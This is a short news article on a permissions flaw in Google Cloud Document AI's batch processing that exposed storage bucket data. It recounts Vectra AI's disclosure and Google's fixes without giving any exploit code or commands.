Document AI, a Google Cloud service for file processing, had a worrying security flaw which allowed threat actors to steal sensitive data from people’s cloud storage accounts, and possibly even smuggle malware inside, experts have warned.
A report from cybersecurity researchers Vectra AI, who found and reported the flaw to Google in early April 2024, noted how Google Cloud Document AI is a suite of machine learning tools that automates the extraction, analysis, and understanding of documents. It processes unstructured data like invoices, forms, or contracts by converting them into structured, usable information. The service is designed to improve document workflows, enhancing speed and accuracy in data extraction.
Users can process documents stored in Google Cloud via so-called batch processing – automation of document analysis for large volumes of documents simultaneously. During this process, the service uses “service agent”, a Google-managed service that acts as the identity in the process. However, instead of using the caller’s set of permissions for the job, batch processing uses the service agent permissions, which are too broad.
Batch processing woes
As a result, the caller (which could be a malicious individual) can access any Google Cloud Storage buckets within the same project, and through it – all of the data found there. The researchers demonstrated a Proof of Concept to Google, showing how the vulnerability could be abused to exfiltrate a .PDF file, modify it, and then return it to the same place.
Soon after learning about the issue, Google apparently released a patch, and changed the status of the problem as ‘fixed’. However, the researchers said the fix wasn’t sufficient, and pressured the company further. Finally, in early September 2024, Google confirmed applying a downgrade that sorted it out, “because the attacker needs to have an access to an impacted victim’s project.”
Via The Register